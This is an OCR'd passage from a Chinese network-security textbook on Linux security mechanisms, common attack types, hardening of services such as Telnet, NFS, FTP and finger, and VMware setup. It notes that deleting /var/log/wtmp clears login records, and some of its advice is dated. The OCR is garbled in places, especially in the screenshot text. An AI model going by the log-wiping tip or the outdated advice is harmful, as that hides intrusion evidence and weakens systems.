层 数 ,这 种 架构 使 得 虚拟 机 和 硬件 之 间 只 通过 很 薄 的 一 层 进行 连接 ,因而 虚拟 机 执行 效 
率 非 常 高 ,可 以 更 加 充分 地 利用 硬件 资源 ,使 虚拟 机 系统 性 能 非常 接近 真实 的 操作 系统 
性 能 。 

4) Internet Information Server(JIS) 7.0 

Internet Information Server(JIS) 7. 0 支持 以 FastCGI 方式 运行 PHP, 与 Windows 
Server 2003(JIIS 6.0) 和 Windows 2000(IIS 5.0) 相 比 有 很 大 的 提高 。 


3.1.3 Linux 系统 安全 


随 着 Internet/Intranet 的 日 益 普及 ,采用 Linux 网 络 操作 系统 作为 服务 器 的 用 户 也 越 
来 越 多 ,这 一 方面 是 因为 Linux 是 开放 源 代 码 的 免费 正版 软件 , 另 一 方面 也 是 因为 较 之 微软 
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的 Windows NT 网 络 操作 系统 而 言 ,Linux 系统 具有 更 好 的 稳定 性 、 效 率 性 和 安全 性 。 在 使 
用 Linux 系统 时 ,也 要 详细 了 解 它 的 安全 机 制 , 找 出 它 可 能 的 安全 隐患 ,给 出 相应 的 安全 策 
略 和 保护 措施 。 

1. Linux 网 络 操作 系统 的 基本 安全 机 制 

Linux 网 络 操作 系统 提供 了 用 户 账号 文件 系统 权限 和 系统 日 志文 件 等 基本 安全 机 制 ， 
如 果 这 些 安全 机 制 配 置 不 当 , 就 会 使 系统 存在 一 定 的 安全 隐患 。 因 此 ,网 络 系统 管理 员 必 须 
小 心地 设置 这 些 安全 机 制 。 

1) Linux 系统 的 用 户 账号 

在 Linux 系统 中 ,用 户 账号 是 用 户 的 身份 标志 , 它 由 用 户 名 和 用 户口 令 组 成 。 在 Linux 
系统 中 ,系统 将 输入 的 用 户 名 存放 在 /etc/passwd 文件 中 ,而 将 输入 的 口令 以 加 密 的 形式 存 
放 在 /etc/shadow 文件 中 。 在 正常 情况 下 ,这 些 口令 和 其 他 信息 由 操作 系统 保护 ,能 够 对 其 
进行 访问 的 只 能 是 超级 用 户 (root) 和 操作 系统 的 一 些 应 用 程序 。 但 是 如 果 配 置 不 当 或 在 一 
些 系统 运行 出 错 的 情况 下 ,这 些 信 息 可 以 被 普通 用 户 得 到 。 进 而 ,恶意 的 用 户 就 可 以 使 用 口 
令 破 解 工具 去 得 到 加 密 前 的 口令 。 

2) Linux 的 文件 系统 权限 

Linux 文件 系统 的 安全 主要 是 通过 设置 文件 的 权限 来 实现 的 。 每 一 个 Linux 的 文件 或 
目录 都 有 三 组 属性 ,分 别 定义 文件 或 目录 的 所 有 者 、 用 户 组 和 其 他 人 的 使 用 权限 (只 读 、 可 
写 , 可 执行 ,允许 SUID、 人 允许 SGID 等 )。 特 别 注意 ,权限 为 SUID 和 SGID 的 可 执行 文件 ， 
在 程序 运行 过 程 中 ,会 给 进程 赋予 所 有 者 的 权限 ,如 果 被 黑客 发 现 并 利用 就 会 给 系统 造成 
危害 。 

3) 合理 利用 Linux 的 日 志文 件 

Linux 的 日 志文 件 用 来 记录 整个 操作 系统 的 使 用 状况 。 作 为 一 个 Linux 网 络 系统 管理 
员 要 充分 用 好 以 下 几 个 日 志文 件 。 

(1) /var/log/lastlog 文件 

记录 最 后 进入 系统 的 用 户 的 信息 ,包括 登录 的 时 间 、 登 录 是 否 成 功 等 信息 。 这 样 用 户 登 
录 后 只 要 用 lastlog 命令 查看 一 下 /var/log/lastlog 文件 中 记录 的 所 用 账号 的 最 后 登录 时 
间 , 再 与 自己 的 用 机 记录 对 比 一 下 就 可 以 发 现 该 账号 是 否 被 黑客 盗用 。 

(2) /var/log/secure 文件 

记录 系统 自 开通 以 来 所 有 用 户 的 登录 时 间 和 地 点 ,可 以 给 系统 管理 员 提 供 更 多 的 
参考 。 

(3) /var/log/wtmp 文件 

记录 当前 和 历史 上 登录 到 系统 的 用 户 的 登录 时 间 、 地 点 和 注销 时 间 等 信息 。 可 以 用 
last 命令 查看 , 若 想 清除 系统 登录 信息 ,只 需 删 除 这 个 文件 ,系统 会 生成 新 的 登录 信息 。 

2. Linux 网 络 系统 可 能 受到 的 攻击 和 安全 防范 策略 

Linux 操作 系统 是 一 种 公开 源码 的 操作 系统 ,因此 比较 容易 受到 来 自 底 层 的 攻击 ,系统 
管理 员 一 定 要 有 安全 防范 意识 ,通过 采取 一 定 的 安全 措施 ,来 提高 Linux 系统 的 安全 性 。 为 
了 保护 好 系统 ,要 清楚 Linux 网 络 系统 可 能 面 对 的 各 种 攻击 。Linux 网 络 系统 可 能 受到 的 


Ra 
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攻击 类 型 主要 如 下 。 

1)“ 拒 绝 服务 ”攻击 

所 谓 “ 拒 绝 服 务 ” 攻 击 是 指 黑客 采取 具有 破坏 性 的 方法 阻塞 目标 网 络 的 资源 ,使 网 络 暂 
时 或 永久 瘫痪 ,从 而 使 Linux 网 络 服务 器 无 法 为 正常 的 用 户 提供 服务 。 例 如 黑客 可 以 利用 
伪造 的 源 地 址 或 受 控 的 其 他 地 方 的 多 台 计 算 机 同时 向 目标 计算 机 发 出 大 量 、 连 续 的 TCP 连 
接 请 求 , 从 而 使 目标 服务 器 系统 瘫痪 。 

2)“ 口 令 破解 ”攻击 

口令 安全 是 保卫 自己 系统 安全 的 第 一 道 防线 。“ 口 令 破解 ”攻击 的 目的 是 为 了 破解 用 户 
的 口令 ,从 而 可 以 取得 已 经 加 密 的 信息 资源 。 例 如 黑客 可 以 利用 一 台 高 速 计算 机 ,配合 一 个 
字典 库 , 尝 试 各 种 口令 组 合 ,直到 最 终 找 到 能 够 进入 系统 的 口令 ,打开 网 络 资源 。 

3)“ 欺 骗 用 户 ” 攻 击 

“欺骗 用 户 ” 攻 击 是 指 网 络 黑客 伪装 成 网 络 公司 或 计算 机 服务 商 的 工程 技术 人 员 , 向 用 
户 发 出 呼叫 ,并 在 适当 的 时 候 要 求 用 户 输入 口令 ,这 是 用 户 最 难 对 付 的 一 种 攻击 方式 ,一 旦 
用 户口 令 失 密 , 黑 客 就 可 以 利用 该 用 户 的 账号 进入 系统 。 

4)“ 扫 描 程 序 和 网 络 监听 ”攻击 

许多 网 络 入 侵 是 从 扫描 开始 的 ,利用 扫描 工具 黑客 能 找 出 目标 主机 上 各 种 各 样 的 漏洞 ， 
并 利用 这 些 漏洞 对 系统 实施 攻击 。 

网 络 监听 也 是 黑客 们 常用 的 一 种 方法 ,当成 功 地 登录 到 一 台 网 络 上 的 主机 ,并 取得 了 这 
台 主 机 的 超级 用 户 控制 权 之 后 ,黑客 可 以 利用 网 络 监听 收集 敏感 数据 或 者 认证 信息 ,以 便 日 
后 夺取 网 络 中 其 他 主机 的 控制 权 。 

3. Linux 网 络 安全 防范 策略 

Linux 系统 作为 一 个 开放 系统 ,存在 着 很 多 针对 不 同 应 用 的 程序 和 工具 , 它 一 方面 方便 
了 用 户 , 同 时 也 方便 了 黑客 ,黑客 可 以 利用 这 些 程序 和 工具 来 人 侵 系统 ,给 系统 造成 威胁 。 
有 时 攻击 不 只 来 自 外 网 ,还 来 自 于 内 部 网 络 , 同 样 内 部 的 安全 设置 不 可 忽视 。 不 过 ,只 要 仔 
细 设 定 系统 功能 ,并 加 上 必要 的 安全 措施 ,就 能 让 黑客 无 机 可 乘 。 

1) 仔细 设置 每 个 内 部 用 户 的 权限 

为 了 保护 Linux 网 络 系统 的 资源 ,在 给 内 部 网 络 用 户 开 设 账号 时 ,要 仔细 设置 每 个 内 部 
用 户 的 权限 ,一般 应 遵循 “最 小 权限 "原则 ,也 就 是 仅 给 每 个 用 户 授 予 完成 他 们 特定 任务 所 必 
需 的 服务 器 访问 权限 。 这 样 做 会 大 大 加 重 系统 管理 员 的 管理 工作 量 , 但 为 了 整个 网 络 系统 
的 安全 还 是 应 该 坚持 这 个 原则 。 

2) 确保 用 户口 令 文件 /etc/shadow 的 安全 

对 于 网 络 系统 而 言 ,口令 是 比较 容易 出 问题 的 地 方 , 作 为 系统 管理 员 应 告诉 用 户 在 设置 
口令 时 要 使 用 安全 口令 (在 口令 序列 中 使 用 非 字 母 、 非 数字 等 特殊 字符 ) 并 适当 增加 口令 的 
长 度 ( 大 于 6 个 字符 )。 系 统管 理 员 要 保护 好 /etc/passwd 和 /etc/shadow 这 两 个 文件 的 安 
全 ,不 让 无 关 的 人 员 获 得 这 两 个 文件 ,这 样 黑客 利用 John 等 程序 对 /etc/passwd 和 /etc/ 
shadow 文件 进行 字典 攻击 获取 用 户口 令 的 企图 就 无 法 进行 。 系 统管 理 员 要 定期 用 John 等 
程序 对 本 系统 的 /etc/passwd 和 /etc/shadow 文件 进行 模拟 字典 攻击 ,一旦 发 现 有 不 安全 的 
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用 户口 令 , 要 强制 用 户 立即 修改 。 

3) 加 强 对 系统 运行 的 监控 和 记录 

Linux 网 络 系统 管理 员 ,应 对 整个 网 络 系统 的 运行 状况 进行 监控 和 记录 ,这 样 通过 分 析 
记录 数据 ,可 以 发 现 可 疑 的 网 络 活动 ,并 采取 措施 预先 阻止 今后 可 能 发 生 的 入 侵 行为 。 如 果 
进攻 行为 已 经 实施 , 则 可 以 利用 记录 数据 跟踪 和 识别 侵入 系统 的 黑客 。 

4) 合理 划分 子 网 和 设置 防火 墙 

如 果 内 部 网 络 要 进入 Internet, 必 须 在 内 部 网 络 与 外 部 网 络 的 接口 处 设置 防火 墙 ,以 确 
保 内 部 网 络 中 的 数据 安全 。 对 于 内 部 网 络 本 身 ,为 了 便于 管理 ,合理 分 配 IP 地 址 资源 ,应 该 
将 内 部 网 络 划分 为 多 个 子 网 ,这 样 做 也 可 以 阻止 或 延缓 黑客 对 整个 内 部 网 络 的 入 侵 。 

5) 定期 对 Linux 网 络 进行 安全 检查 

Linux 网 络 系统 的 运转 是 动态 变化 的 ,因此 对 它 的 安全 管理 也 是 变化 的 ,没有 固定 的 模 
式 , 作 为 Linux 网 络 系统 的 管理 员 ,在 为 系统 设置 了 安全 防范 策略 后 ,应 定期 对 系统 进行 安 
全 检查 ,并 尝试 对 自己 管理 的 服务 器 进行 攻击 ,如 果 发 现 安全 机 制 中 的 漏洞 应 立即 采取 措施 
补救 ,不 给 黑客 以 可 乘 之 机 。 

6) 保护 最 新 的 系统 核心 

由 于 Linux 系统 的 开放 性 ,经常 有 更 新 的 程序 和 系统 补丁 出 现 ,因此 为 了 加 强 系统 安 
全 ,一 定 要 经 常 更 新 系统 内 核 。 

Kernel 是 Linux 操作 系统 的 核心 , 它 常 驻 内 存 ,用 于 加 载 操作 系统 的 其 他 部 分 ,并 实现 
操作 系统 的 基本 功能 。 由 于 Kernel 控制 计算 机 和 网 络 的 各 种 功能 ,因此 , 它 的 安全 性 对 整 
个 系统 安全 至 关 重 要 。 

早期 的 Kernel 版 本 存在 许多 众所周知 的 安全 漏洞 ,而 且 也 不 太 稳定 ,只 有 2.0.x 以 上 
的 版 本 才 比 较 稳 定 和 安全 ,新 版 本 的 运行 效率 也 有 很 大 改观 。 在 设 定 Kernel 的 功能 时 ,只 
选择 必要 的 功能 , 千 万 不 要 将 所 有 功能 全 部 选择 ,否则 会 使 Kernel 变 得 很 大 , 既 占 用 系统 资 
源 ,也 给 黑客 留 下 可 乘 之 机 。 

7) 制定 适当 的 数据 备份 计划 确保 系统 万 无 一 失 

没有 一 种 操作 系统 的 运转 是 百分之百 可 靠 的 ,也 没有 一 种 安全 策略 是 万 无 一 失 的 ,因此 
作为 Linux 系统 管理 员 ,必须 为 系统 制定 适当 的 数据 备份 计划 ,充分 利用 磁带 机 、 光 盘 刻 录 
机 、 双 机 热 备 份 等 技术 手段 为 系统 保存 数据 备份 ,使 系统 一 旦 遭 到 破坏 或 黑客 攻击 而 发 生 次 
痪 时 ,能 迅速 恢复 工作 ,把 损失 减少 到 最 小 。 

CD-ROM 备份 是 当前 最 好 的 系统 备份 介质 ,将 数据 备份 以 后 ,可 以 定期 将 系统 与 光盘 
内 容 进 行 比较 以 验证 系统 的 完整 性 是 否 遭 到 破坏 。 如 果 对 安全 级 别 的 要 求 特 别 高 ,那么 可 
以 将 光盘 设置 为 可 启动 的 并 且 将 验证 工作 作为 系统 启动 过 程 的 一 部 分 。 这 样 只 要 可 以 通过 
光盘 启动 ,就 说 明 系 统 尚未 被 破坏 过 。 

如 果 创 建 了 一 个 只 读 的 分 区 ,那么 可 以 定期 从 光盘 映像 重新 装载 它们 。 即 使 像 /boot、 
/lib 和 /sbin 这 样 不 能 被 安装 成 只 读 的 分 区 ,仍然 可 以 根据 光盘 映像 来 检查 它们 ,甚至 可 以 
在 启动 时 从 另 一 个 安全 的 映像 重新 下 载 它们 。 

4. 加 强 Linux 网 络 服务 器 的 管理 


可 以 通过 以 下 措施 来 实现 网 络 服务 器 的 安全 使 用 。 
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1) 利用 记录 工具 ,记录 对 Linux 系统 的 访问 

Linux 系统 管理 员 可 以 利用 前 面 所 述 的 记录 文件 和 记录 工具 记录 事件 ,可 以 每 天 查看 
或 扫描 记录 文件 ,这 些 文件 记录 了 系统 运行 的 所 有 信息 。 如 果 需 要 ,还 可 以 把 高 优先 级 的 事 
件 提 取出 来 传送 给 相关 人 员 处 理 , 如 果 发 现 异常 可 以 立即 采取 措施 。 

2) 慎 用 Telnet 服务 

在 Linux 下 ,用 Telnet 进行 远程 登录 时 ,用 户 名 和 用 户 密码 是 以 明文 传输 的 ,这 就 有 可 
能 被 在 网 上 监听 的 其 他 用 户 截 获 。 另 一 个 危险 是 黑客 可 以 利用 Telnet 登入 系统 ,如 果 黑 客 
又 获得 了 超级 用 户 权 限 , 则 会 对 系统 造成 极 大 的 威胁 。 因 此 ,如 果 不 是 很 需要 的 情况 下 ,不 
要 开放 Telnet 服务 。 如 果 一 定 要 开放 Telnet 服务 ,应 该 要 求 用 户 用 特殊 的 工具 软件 进行 远 
程 登 录 ,这 样 就 能 在 网 上 传送 加 密 过 的 用 户 密码 ,防止 密码 在 传输 过 程 中 被 黑客 截获 。 

3) 合理 设置 NFS 服务 和 NIS 服务 

NFS(Network File System ,网 络 文件 系统 ) 服 务 ,允许 工作 站 通过 网 络 共享 一 个 或 多 个 
服务 器 输出 的 文件 系统 。 但 对 于 配置 得 不 合理 的 NFS 服务 器 来 讲 , 用 户 不 经 登录 就 可 以 阅 
读 或 者 更 改 存储 在 NFS 服务 器 上 的 文件 ,使 得 NFS 服务 器 很 容易 受到 攻击 。 如 果 一 定 要 提 
供 NFS 服 务 ,要 确保 基于 Linux 的 NFS 服务 器 支持 Secure RPC(Secure Remote Procedure 
CalD ,以 便利 用 DES(Data Encryption Standard) 加 密 算法 和 指数 密 钥 交换 (Exponential 
Key Exchange) 技 术 验 证 每 个 NFS 请 求 的 用 户 身 份 。 

NISCNetwork Information System, 网 络 信息 系统 ) 服 务 ,是 一 个 分 布 式 数据 处 理 系 统 ， 
它 使 网 络 中 的 计算 机 通过 网 络 共 享 passwd 文件 ,group 文件 .主机 表 文 件 和 其 他 共享 的 系 
统 资源 。 通 过 NIS 服务 和 NFS 服务 ,在 整个 网 络 中 的 各 个 工作 站 上 操作 网 络 中 共享 的 数 
据 就 像 在 操作 本 地 计算 机 系统 中 的 资源 一 样 ,并 且 这 种 操作 过 程 对 用 户 是 透明 的 。 但 是 
NIS 服务 也 有 漏洞 ,如 非法 用 户 可 以 利用 自己 编写 的 程序 来 模仿 Linux 系统 中 的 ypserv 响 
应 ypbind 的 请 求 , 从 而 截获 用 户 的 密码 。 因 此 ,NIS 的 用 户 一 定 要 使 用 ypbind 的 secure 选 
项 ,并 且 不 接受 端口 号 小 于 1024( 非 熟知 端口 ) 的 ypserv 响应 。 

4) 仔细 配置 FTP 服务 

FTP 服务 与 前 面 讲 的 Telnet 服务 一 样 ,用 户 名 和 用 户 密 码 也 是 明文 传输 的 。 因 此 ,为 
了 系统 的 安全 ,必须 对 /etc/ftpusers 文件 进行 合理 配置 ,禁止 root bin .daemon adm 等 特 
殊 用 户 对 FTP 服务 器 进行 远程 访问 ,通过 对 /etc/ftphosts 设 定 限 制 , 某 些 主机 不 能 连 入 
FTP 服务 器 ,如 果 系统 开放 匿名 FTP 服务 , 则 任何 人 都 可 以 下 载 文件 (有 时 还 可 以 上 载 文 
件 ) ,因此 ,除非 特别 需要 ,一 般 应 禁止 匿名 FTP 服务 。 

5) 合理 设置 POP3 和 Sendmail 等 电子 邮件 服务 

对 一 般 的 POP3 服务 来 讲 ,电子 邮件 用 户 的 口令 也 是 按 明文 方式 传送 ,黑客 可 以 很 容易 
截获 用 户 名 和 用 户 密码 。 为 了 防止 此 类 问题 的 出 现 ,必须 安装 支持 加 密 传送 密码 的 POP3 
服务 器 ( 即 支持 Authenticated POP 命令 ) ,这样 用 户 在 向 网 络 中 传送 密码 之 前 ,可 以 先 对 密 
码 加 密 。 最 新 版 的 Sendmail 服务 器 软件 在 安全 方面 比 老 版 本 的 Sendmail 邮件 服务 器 做 得 
完善 ,所 以 要 尽量 选用 新 的 邮件 服务 器 。 

6) 加 强 对 WWW 服务 器 的 管理 ,提供 安全 的 WWW 服务 

当 一 个 基于 Linux 系统 的 网 站 建立 好 之 后 , 绝 大 部 分 用 户 是 利用 WWW 浏览 器 来 访问 
Web 服务 器 ,因此 必须 特别 重视 Web 服务 器 的 安全 ,无 论 采 用 哪 种 基于 HTTP 的 Web 服 
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务 器 软件 ,都 要 特别 关注 CGI(Common Gateway Interface) 肢 本。 这 些 CGI 脚本 是 可 执行 
程序 ,一 般 存放 在 Web 服务 器 的 CGI-BIN 目录 下 面 ,在 配置 Web 服务 器 时 ,要 保证 CGI 可 执 
行 脚本 只 存放 于 CGILBIN 目录 中 ,这 样 可 以 保证 脚本 的 安全 , 且 不 会 影响 到 其 他 目录 的 安全 。 

7) 禁止 finger 服务 

在 Linux 系统 下 ,使 用 finger 命令 ,可 以 显示 本 地 或 远程 系统 中 目前 已 登录 用 户 的 详细 
信息 ,黑客 可 以 利用 这 些 信息 , 增 大 侵入 系统 的 机 会 。 为 了 系统 的 安全 ,最 好 禁止 提供 
finger 服务 , 即 从 /usr/bin 下 删除 finger 命令 。 如 果 要 保留 finger 服务 ,应 将 finger 文件 换 
名 ,或 修改 权限 为 只 允许 root 用 户 执行 finger 命令 。 


3.2 安装 与 配置 VMware 虚拟 机 


3.2.1 虚拟 机 简介 


网 络 安全 是 一 门 实践 性 很 强 的 学 科 , 良 好 的 实验 配置 是 必需 的 。 而 虚拟 机 实现 了 一 台 
物理 机 同时 运行 两 台 或 更 多 台 虚 拟 机 的 情形 。 下 面 对 VMware 虚拟 机 进行 基本 的 介绍 。 

1. 虚拟 机 的 概念 

所 谓 虚拟 机 就 是 虚拟 计算 机 。 虚 拟 机 就 是 通过 软件 在 一 台 计 算 机 上 模拟 出 来 若干 台 可 
以 独立 运行 而 互 不 干扰 的 多 个 具有 相同 或 不 同 操作 系统 的 计算 机 。 其 特别 之 处 在 于 ,每 一 
台 虚 拟 机 都 与 真实 的 计算 机 类 似 , 拥 有 自己 的 CPU、 内 存 \ 硬 盘 、 光 驱 等 硬件 设备 ,甚至 还 有 
自己 的 BIOS。 在 虚拟 机 上 ,可 以 安装 Windows、Linux 等 真实 的 操作 系统 和 各 种 应 用 程序 ， 
并 能 够 同时 运行 多 台 装 有 不 同 操作 系统 的 虚拟 机 。 在 虚拟 机 上 用 户 可 以 随意 进行 任何 操 
作 ,都 不 会 影响 到 本 机 系统 。 如 果 本 机 系统 足够 强大 ,用 户 甚至 可 以 同时 运行 多 个 虚拟 机 来 
进行 复杂 的 网 络 实验 。 虽 然 虚拟 机 是 由 本 机 系统 模拟 出 来 的 ,但 两 者 之 间 互 不 影响 。 当 虚 
拟 机 因 操 作 失 误 崩 溃 时 ,用 户 可 以 直接 将 虚拟 系统 删除 而 丝毫 影响 不 到 本 机 系统 ,而且 用 户 
安装 完 虚拟 机 之 后 不 需要 重启 计算 机 。 

目前 虚拟 机 有 很 多 种 ,包括 VMware、Microsoft 的 Virtual PC GSX Server、 ESX Server、 
Virtual Server 以 及 Parallers Workstation 等 ,其 中 最 好 用 的 是 VMware 和 Virtual PC。 

2. VMware 

VMware 是 一 款 很 受 欢 迎 的 虚拟 机 软件 , 它 是 由 VMware 公司 开发 的 。VMware 根据 
使 用 者 的 不 同 可 以 分 为 客户 端 和 服务 器 端 虚拟 机 。 而 用 户主 要 使 用 的 就 是 客户 端 , 即 
VMware Workstation。 它 是 唯一 能 同时 在 Windows 和 Linux 平台 上 运行 的 虚拟 机 软件 。 

VMware Workstation 的 最 新 版 本 是 VMware Workstation v8. 0. 2, 它 提供 三 个 版 本 : 
VMware-ESX-Server( 它 本 身 就 是 一 个 操作 系统 ,不 需要 其 他 操作 系统 的 支持 , 带 有 远程 
Web 管理 和 客户 端 管理 功能 )\VMware-GSX-Server( 它 需要 在 主 系统 上 安装 ,要 Windows 
2000 以 上 的 Windows 系统 或 Linux 系统 ,同样 具有 远程 Web 管理 和 客户 端 管理 功能 )、 
VMware Workstation( 不 具有 远程 Web 管理 和 客户 端 管理 功能 ) 。 

3. Virtual PC 


Virtual PC 可 以 在 Mac OS 和 Windows 操作 系统 上 模拟 x86 计算 机 ,并 在 其 中 安装 和 
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运行 操作 系统 。 该 系统 原来 由 Connectix 公司 开发 ,并 由 原来 只 在 Mac OS 运行 改 为 跨 平 
台 。 现 在 被 微软 公司 收购 ,并 正式 改名 为 Windows Virtual PC。 如 果 本 机 系统 够 好 ， 
Virtual PC 可 以 在 一 台 计 算 机 上 最 多 同时 运行 32 个 操作 系统 , 它 的 设置 过 程 比 较 简 单 。 

微软 公司 于 2006 年 宣布 Virtual PC 成 为 免费 软件 。 它 的 最 新 版 本 支持 Windows 
Vista 系统 的 安装 。 


3.2.2 VMware 的 安装 与 配置 


1. 计算 机 硬件 配置 

虚拟 机 毕竟 是 将 两 台 以 上 的 计算 机 的 任务 集中 在 一 台 计算 机 上 ,所 以 对 硬件 的 要 求 比 
较 高 ,主要 是 CPU 、 硬 盘 和 内 存 。 目 前 的 计算 机 CPU 多 数 是 P4 以 上 ,硬盘 都 是 几 百 GB, 这 
样 的 配置 已 经 完全 能 满足 要 求 。 关 键 是 内 存 , 内 存 的 大 小 等 于 本 机 系统 加 上 虚拟 机 操作 系 
统 需求 之 和 。 

2. 对 本 机 操作 系统 的 要 求 

用 户 安装 不 同 的 虚拟 机 ,对 本 机 的 操作 系统 要 求 不 同 。VMware 既 可 以 运行 在 
Windows 中 ,也 可 以 运行 在 Linux 中 ,但 它 运行 的 Windows 操作 系统 必须 是 NT 版 本 以 
上 。Virtual PC 可 以 运行 在 Windows 和 Mac OS 操作 系统 上 ,但 它 运 行 的 Windows 操作 系 
统 必 须 是 Windows 95 以 上 。 

3. 虚拟 机 VMware 的 安装 

下 面 通过 图 示 ,说 明 虚 拟 机 的 安装 过 程 。 

(1) 将 VMware 安装 程序 解压 到 指定 文件 夹 下 面 ,双击 安装 程序 ,开始 安装 。 

(2) 接 下 来 的 几 步 均 按 系统 的 默认 选项 设置 ,由 于 通常 不 会 用 到 调试 组 件 , 所 以 选择 
Custom 方式 进行 安装 。 

(3) 在 单 击 Next 后 ,界面 上 出 现 的 Integrated Virtual Debuggers 选项 是 不 需要 的 ,所 
以 右 击 该 选项 ,选择 This feature will not be available 去 掉 该 属性 ,执行 后 如 图 3-2 所 示 。 


Custom Setup 
Select the program features you want installed. 


Clhick on an icon in the list below to change how a feature is installed. 
:| core components | 
国 Integrated Yrtual Debuggers tee 
ated 


Install to; 


Installshi 


nst allshield 
Wm] Se | Ce 


图 3-2 定制 安装 软件 的 方式 
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(4) 完成 了 上 述 安装 步骤 后 ,下 面 的 步骤 不 需 特别 设置 ,直接 单 击 Next, 进行 默认 
安装 。 

(5) 经 过 上 述 的 设置 后 , 单 击 Install 进行 安装 。 

(6) 经 过 一 段 时 间 的 安装 后 ,软件 提示 要 求 输入 序列 号 ,只 要 输入 可 用 的 序列 号 ,就 可 
继续 安装 。 

(7) 最 后 , 单 击 Finish 结束 安装 ,此 时 会 提示 重启 计算 机 ,实际 上 不 重启 也 可 以 开始 
使 用 。 


4. 配置 VMware 


在 VMware Workstation 上 安装 虚拟 系统 之 前 ,用 户 还 要 对 其 进行 一 些 基 本 的 配置 。 
打开 桌面 上 的 VMware Workstation 应 用 程序 后 ,会 弹出 License Agreement 对 话 框 ,这 时 
选择 YES, 就 可 继续 配置 。 

(1) 表示 同意 后 ,进入 到 工作 界面 , 单 击 New Virtual Machine, 如 图 3-3 所 示 。 

(2) 在 图 3-3 的 工作 界面 中 ,选择 新 建 一 个 虚拟 机 一 一 单 击 New Virtual Machine, 新 建 
一 个 虚拟 机 。 


File Edit Yiew WM Tean Vaders Help a 
i 全 :加 加 | 回回 加 :名人 多 


Sidebar x | 合 home x 
BD Powered On 


国生 Favorites VMware Workstation 


VMware Workstation alows multiple standard operating Systems and their applications to 
run with high performance in secure and transportable virtual machines, Each virtual 
machine is equivalent to a PC with a unique network address and full complement of 
hardware choices. 


Clhick this button to create a new virtual machine, You then can install 
and run a variety of standard operating systems in the virtual machine. 
New Virtual 
Machine 


Click this button to create a new team, You then can add several virtual 
machines and connect them with private team LAN segments, 


New Team 


Ciek thi btton to browse for vitual martines or toams and to sclect 
人 one to display in this panel, You then can interact with the 9 
[HH operating system Within this display as you sn PC， 


图 3-3 虚拟 机 的 工作 界面 


(3) 为 了 详细 说 明 虚 拟 机 的 相关 原理 ,在 新 建 的 过 程 中 ,进行 Custom 自 定义 安装 。 下 
面 按照 默认 设置 继续 安装 一 “选择 默认 的 Workstation 6. 5” 一 单 击 Next。 在 随后 出 现 的 界 
面 上 ,使 用 光盘 安装 Linux 系统 ,所 以 选择 第 一 个 选项 一 一 Installer disc。 

(4) 设置 好 后 , 单 击 Next, 弹 出 Processor Configuration 操作 界面 ,依据 本 机 情况 ,对 处 
理 器 的 个 数 进行 设置 一 一 选择 One, 单 击 Next, 弹 出 Memory for the Virtual Machine 
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界面 。 

(5) 为 了 虚拟 机 更 好 的 运行 ,需要 设置 内 存 大 小 。 在 弹出 的 Memory for the Virtual 
Machine 界面 上 ,依据 实际 需要 进行 内 存 大 小 的 设置 ,完成 后 单 击 Next, 出现 Network 
connection 设置 界面 。 进 入 网 络 设置 界面 ,这 里 有 三 种 虚拟 机 网 络 连接 的 方式 ,它们 各 有 特 
点 ,各 有 应 用 场合 ,下 面 对 其 进行 简单 的 介绍 。 

GD Bridge 模式 ( 桥 模式 ) 。 

这 种 模式 在 新 建 虚拟 机 的 时 候 是 默认 选择 的 ,是 将 虚拟 主机 的 虚拟 网 卡 桥接 到 一 个 
Host 主机 的 物理 网 卡 上 面 ,实际 上 是 将 Host 主机 的 物理 网 卡 设置 为 混杂 模式 ,从 而 达到 侦 
听 多 个 IP 的 能 力 。 在 这 种 模式 下 ,虚拟 主机 的 虚拟 网 卡 直接 与 Host 主机 的 物理 网 卡 所 在 
的 网 络 相 连 ,可 以 理解 为 虚拟 机 和 Host 主机 处 于 对 等 的 地 位 ,在 网 络 关 系 上 是 平等 的 , 没 
有 谁 主 谁 次 之 分 。 默 认 使 用 虚拟 网 卡 VMnet0。 

@ NAT 模式 。 

这 种 模式 下 Host 主机 的 “网 络 连接 ”中 会 出 现 一 个 虚拟 的 网 卡 VMnet8( 默 认 情 况 下 ) 。 
如 果 做 过 Windows 2000/2003 的 NAT 服务 器 的 实验 就 会 理解 : Host 主机 上 的 VMnet8 
虚拟 网 卡 就 相当 于 连接 到 内 网 的 网 卡 ,Host 主机 上 的 物理 网 卡 就 相当 于 连接 到 外 网 的 网 
卡 , 而 虚拟 机 本 身 则 相当 于 运行 在 内 网 上 的 计算 机 ,虚拟 机 内 的 虚拟 网 卡 则 独立 于 Virtual 
Ethernet Switch(VMnet8)。 在 这 种 方式 下 ,VMware 自 带 的 DHCP 服务 会 默认 地 加 载 到 
Virtual Ethernet Switch(VMnet8) 上 ,这 样 虚拟 机 就 可 以 使 用 DHCP 服务 。 更 为 重要 的 
是 ,VMware 自 带 了 NAT 服务 ,提供 了 从 Host 主机 的 VMnet8 虚拟 网 卡 到 外 网 的 地 址 转 
换 。 所 以 这 种 情况 是 一 个 实 实在 在 的 NAT 服务 器 在 运行 ,只 不 过 是 供 虚拟 机 用 的 NAT。 

@ Host-Only 模式 。 

这 种 模式 是 一 种 封闭 的 方式 ,适合 在 一 个 独立 的 环境 中 进行 各 种 网 络 实 验 。 这 种 方式 
下 Host 主机 的 “网 络 连接 ”中 出 现 了 一 个 虚拟 的 网 卡 VMnet1 (默认 情况 下 )。 和 NAT 唯 
一 的 不 同 的 是 : 此 种 方式 下 ,没有 地 址 转换 服务 。 因 此 在 这 种 情况 下 ,虚拟 机 只 能 访问 到 主 
机 ,这 也 是 Host-Only 的 名 字 的 意义 。 默 认 情 况 下 该 模式 也 会 有 一 个 DHCP 服务 加 载 到 
Virtual Ethernet Switch(CVMnetl) 上 。 这 样 连接 到 Virtual Ethernet Switch(VMnet1) 上 的 
虚拟 机 仍然 可 以 设置 成 DHCP, 主 要 是 方便 系统 的 配置 。 

根据 以 上 介绍 和 实现 情况 ,选择 第 一 种 方式 一 一 Use bridged networking, 然 后 单 击 
Next, 进 入 Disk 设置 窗口 。 

(6) 在 这 里 需要 进行 硬盘 设置 ,这 时 选择 第 一 个 选项 一 一 新 建 一 个 虚拟 硬盘 , 单 击 
Next, 进 入 Select A Disk Type 界面 。 

(7) 在 Select A Disk Type 界面 ,选择 的 硬盘 类 型 是 IDE, 继 续 单 击 Next, 下 一 步 设置 
虚拟 硬盘 的 大 小 ,最 小 设置 为 7GB, 然 后 单 击 Next, 弹 出 存放 虚拟 机 位 置 的 对 话 框 。 在 此 对 
话 框 中 , 单 击 Browse, 选 择 虚 拟 机 磁盘 存放 的 位 置 , 设 置 好 后 , 单 击 Next, 结 束 配 置 。 

5. 更 改 虚拟 机 的 配置 

